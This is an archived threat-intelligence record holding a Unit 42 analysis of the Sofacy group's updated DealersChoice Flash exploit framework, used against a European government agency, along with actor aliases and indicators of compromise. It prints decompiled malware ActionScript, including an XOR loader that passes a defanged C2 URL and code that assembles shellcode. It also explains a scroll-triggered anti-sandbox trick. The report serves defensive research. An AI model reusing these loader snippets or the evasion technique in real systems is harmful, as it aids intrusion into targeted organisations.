{
	"id": "bd8099b9-bd42-4ae4-b8a7-0a5f7da714a1",
	"created_at": "2026-04-06T00:07:31.715958Z",
	"updated_at": "2026-04-10T03:37:50.298786Z",
	"deleted_at": null,
	"sha1_hash": "423150ebcb7ad10c2970c20e6510787a7cbb55f1",
	"title": "Sofacy Uses DealersChoice to Target European Government Agency",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 120937,
	"plain_text": "Sofacy Uses DealersChoice to Target European Government Agency\r\nBy Robert Falcone\r\nPublished: 2018-03-15 · Archived: 2026-04-05 14:10:09 UTC\r\nSummary\r\nBack in October 2016, Unit 42 published an initial analysis on a Flash exploitation framework used by the Sofacy threat group called DealersChoice. The attack consisted of Microsoft Word delivery documents that contained Adobe Flash objects capable of loading additional malicious Flash objects embedded in the file or directly provided by a command and control server. Sofacy continued to use DealersChoice throughout the fall of 2016, which we also documented in our December 2016 publication discussing Sofacy’s larger campaign.\r\nOn March 12 and March 14, we observed the Sofacy group carrying out an attack on a European government agency involving an updated variant of DealersChoice. The updated DealersChoice documents used a similar process to obtain a malicious Flash object from a C2 server, but the inner mechanics of the Flash object contained significant differences in comparison to the original samples we analyzed.\r\nOne of the differences was a particularly clever evasion technique: to our knowledge this has never been observed in use. With the previous iterations of DealersChoice samples, the Flash object would immediately load and begin malicious tasks. In the March attacks, the Flash object is only loaded if the user scrolls through the entire content of the delivery document and views the specific page the Flash object is embedded on. Also, DealersChoice requires multiple interactions with an active C2 server to successfully exploit an end system.\r\nThe overall process required for a successful exploitation is:\r\n1. User must open the Microsoft Word email attachment\r\n2. User must scroll to page three of the document, which will run the DealersChoice Flash object\r\n3. The Flash object must contact an active C2 server to download an additional Flash object containing exploit code\r\n4. The initial Flash object must contact the same C2 server to download a secondary payload\r\n5. Victim host must have a vulnerable version of Flash installed\r\nThe Attack\r\nThe attack involving this updated variant of DealersChoice was targeting a European government organization. The attack relied on a spear-phishing email with a subject of \"Defence \u0026 Security 2018 Conference Agenda\" that had an attachment with a filename of \"Defence \u0026 Security 2018 Conference Agenda.docx\". The attached document contains a conference agenda that the Sofacy group appears to have copied directly from the website for the \"Underwater Defence \u0026 Security 2018 Conference\" here.\r\nOpening the attached \"Defence \u0026 Security 2018 Conference Agenda.docx\" file does not immediately run malicious code to exploit the system. Instead, the user must scroll to the third page of the document, which will load a Flash object that contains ActionScript that will attempt to exploit the user’s system to install a malicious payload. The Flash object embedded within this delivery document is a variant of an exploit tool that we call DealersChoice. This suggests that the Sofacy group is confident that the targeted individuals would be interested enough in the content to peruse through it.\r\nhttps://unit42.paloaltonetworks.com/unit42-sofacy-uses-dealerschoice-target-european-government-agency/\r\nPage 1 of 6\r\nWe analyzed the document to determine the reason that the malicious Flash object only ran when the user scrolled to the third page. According to the document.xml file, the DealersChoice loader SWF exists after the \"covert-shores-small.png\" image file within the delivery document. This image file exists on the third page of the document, so the user would have to scroll down in the document to this third page to get the SWF file to run. The user may not notice the Flash object on the page, as Word displays it as a tiny black box in the document, as seen in Figure 1. This is an interesting anti-sandbox technique, as it requires human interaction prior to the document exhibiting any malicious activity.\r\nFigure 1: Flash object appearing as a small black box in the delivery document\r\nUpdated DealersChoice\r\nThis DealersChoice Flash object shares a similar process to previous variants; however, it appears that the Sofacy actors have made slight changes to its internal code. Also, it appears that the actors used ActionScript from an open source video player called “f4player”, which is freely available on GitHub with the following description:\r\nf4Player is an open source flash (AS3) video player and library project. It is so small that it is only 10kb (with skin file) and totally free under GPL license.\r\nThe Sofacy developer modified the f4player’s ActionScript to include additional code to load an embedded Flash object. The additions include code to decrypt an embedded Flash object and an event handler that calls a newly added function (“skinEvent2”) that plays the decrypted object, as seen in the code snippet below:\r\nvar skinEvent2:Function = function(param1:Event):void\r\n{\r\n    skin2 = param1.currentTarget.content;\r\n    stage.addChild(skin2);\r\n    skin2.play(\"hxxp://ndpmedia24[.]com/0pq6m4f.m3u8\");\r\n};\r\nvar mov:Loader = new Loader();\r\nmov.contentLoaderInfo.addEventListener(Event.COMPLETE,skinEvent2);\r\nvar b:ByteArray = new this.Mov();\r\nvar k:uint = 82;\r\nvar i:uint = 4;\r\nwhile(i \u003c b.length)\r\n{\r\n    b[i] = b[i] ^ k;\r\n    i++;\r\n}\r\nmov.loadBytes(b);\r\nThe above code allows DealersChoice to load a second SWF object, specifically loading it with an argument that includes a C2 URL of “hxxp://ndpmedia24[.]com/0pq6m4f.m3u8”.\r\nThe embedded SWF extracts the domain from the C2 URL passed to it and uses it to craft a URL to get the server's 'crossdomain.xml' file in order to obtain permissions to load additional Flash objects from the C2 domain. The ActionScript relies on event listeners to call specific functions when the event \"Event.COMPLETE\" is triggered after successful HTTP requests are issued to the C2 server. The event handlers call functions with the following names, which include an incrementing number that represents the order in which the functions are called:\r\nonload1\r\nonload2\r\nonload3\r\nonload5\r\nWith these event handlers created, the ActionScript starts by gathering system data from the flash.system.Capabilities.serverString property (just like in the original DealersChoice.B samples) and issues an HTTP GET with the system data as a parameter to the C2 URL that was passed as an argument to the embedded SWF when it was initially loaded. When this HTTP request completes, the event listener will call the 'onload1' function.\r\nThe 'onload1' function parses the response data from the request to the C2 URL using regular expressions. According to the following code snippet, it appears the regular expression is looking for a hexadecimal string after \"/\" and before \"/sec\", as well as any string between \"/hls/\" and \"/tracks\":\r\nvar data:String = e.target.data;\r\nvar p1:RegExp = /\\/([0-9a-f]+)\\/sec/gim;\r\nr1 = p1.exec(data);\r\nvar r2:Array = p1.exec(data);\r\nvar p2:RegExp = /\\/hls\\/(.+)\\/tracks/gim;\r\nvar r3:Array = p2.exec(data);\r\nr4 = p2.exec(data);\r\nThe regular expressions suggest that the C2 server responds with content that is meant to resemble HTTP Live Streaming (HLS) traffic, which is a protocol that uses HTTP to deliver audio and video files for streaming. The use of HLS coincides with the use of ActionScript code from the f4player to make the traffic seem legitimate. The variables storing the results of the regular expression matches are used within the ActionScript for further interaction with the C2 server. The following is a list of these variables and their purpose:\r\nVariable - Purpose\r\nr1 - Used as the decryption key for the downloaded SWF file. This will be a 16-byte hexadecimal string.\r\nr2 - Not used.\r\nr3 - Used as the URL within the HTTP request within the onload1 function, specifically as the URL to get the malicious SWF file to exploit the system.\r\nr4 - Used as the URL within the HTTP request within the onload2 function, specifically as the URL to get the payload to run after successful exploitation of the system.\r\nThe 'onload1' function then sends an HTTP GET request to the C2 domain using the value stored in the 'r3' variable as a URL. When this HTTP request completes, the event listener will call the 'onload2' function.\r\nThe 'onload2' function decrypts the response received from the HTTP request issued in the 'onload1' function. It does so by calling a sub-function to decrypt the content, using the value stored in the 'r1' variable as a key. The sub-function to decrypt the content skips the first 4 bytes, suggesting that the first four bytes of the downloaded content are in cleartext (most likely the \"FWS\" or \"CWS\" header to look legitimate).\r\nAfter decrypting the content, the 'onload2' function will issue another HTTP GET request with the system data as a parameter, but this time to the C2 using a URL from the 'r4' variable. When this request completes, the event listener will call the 'onload3' function.\r\nThe 'onload3' function will take the response to the HTTP request in 'onload2' and treat it as the payload. The ActionScript will read each byte of the C2 response, get the hexadecimal value of each byte, and create a text array of 4-byte hexadecimal values with \"0x\" prepended and \",\" appended to each using the following code:\r\nsh = she + (\"0x\" + hex.substr(i + 6,2) + hex.substr(i + 4,2) + hex.substr(i + 2,2) + hex.substr(i,2) + \",\");\r\nThis hexadecimal string will most likely be a string of shellcode that will contain and decrypt the ultimate portable executable (PE) payload. The string of comma separated hexadecimal values is passed as a parameter when loading the SWF file downloaded in 'onload2'. This function creates an event listener for when the SWF file is successfully loaded, which will call the 'onload5' function.\r\nThe 'onload5' function is responsible for adding the newly loaded SWF object as a child object to the current running object using the following code:\r\nstage.addChild(param1.currentTarget.content);\r\nThis loads the SWF file, effectively running the malicious code on the system. During our analysis, we were unable to coerce the C2 into providing a malicious SWF or payload. As mentioned in our previous blogs on DealersChoice, the payload of choice for previous variants was SofacyCarberp (Seduploader), but we have no evidence to suggest this tool was used in this attack. We are actively researching and will update this blog in the event we discover the malicious Flash object and payload delivered in this attack.\r\nLinkage to Prior Campaign\r\nThe delivery document used in this attack was last modified by a user named 'Nick Daemoji', which provides a linkage to previous Sofacy related delivery documents. The previous documents that used this user name were macro-laden delivery documents that installed SofacyCarberp/Seduploader payloads, as discussed in Talos' blog. This overlap also points to a similar social engineering theme between these two campaigns, as both used content from upcoming military and defense conferences as a lure.\r\nConclusion\r\nThe Sofacy threat group continues to use their DealersChoice framework to exploit Flash vulnerabilities in their attack campaigns. In the most recent variant, Sofacy modified the internals of the malicious scripts, but continues to follow the same process used by previous variants by obtaining a malicious Flash object and payload directly from the C2 server. Unlike previous samples, this DealersChoice used a DOCX delivery document that required the user to scroll through the document to trigger the malicious Flash object. The required user interaction turned out to be an interesting anti-sandbox technique that we had not seen this group perform in the past.\r\nIndicators of Compromise\r\nDealersChoice\r\n0cd9ac328d858d8d83c9eb73bfdc59a958873b3d71b24c888d7408d9512a41d7 (Defence \u0026 Security 2018 Conference Agenda.docx)\r\nndpmedia24[.]com\r\nMacro-laden documents\r\ne5511b22245e26a003923ba476d7c36029939b2d1936e17a9b35b396467179ae\r\nefb235776851502672dba5ef45d96cc65cb9ebba1b49949393a6a85b9c822f52\r\nc4be15f9ccfecf7a463f3b1d4a17e7b4f95de939e057662c3f97b52f7fa3c52f\r\nSource: https://unit42.paloaltonetworks.com/unit42-sofacy-uses-dealerschoice-target-european-government-agency/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/unit42-sofacy-uses-dealerschoice-target-european-government-agency/"
	],
	"report_names": [
		"unit42-sofacy-uses-dealerschoice-target-european-government-agency"
	],
	"threat_actors": [
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434051,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/423150ebcb7ad10c2970c20e6510787a7cbb55f1.pdf",
		"text": "https://archive.orkl.eu/423150ebcb7ad10c2970c20e6510787a7cbb55f1.txt",
		"img": "https://archive.orkl.eu/423150ebcb7ad10c2970c20e6510787a7cbb55f1.jpg"
	}
}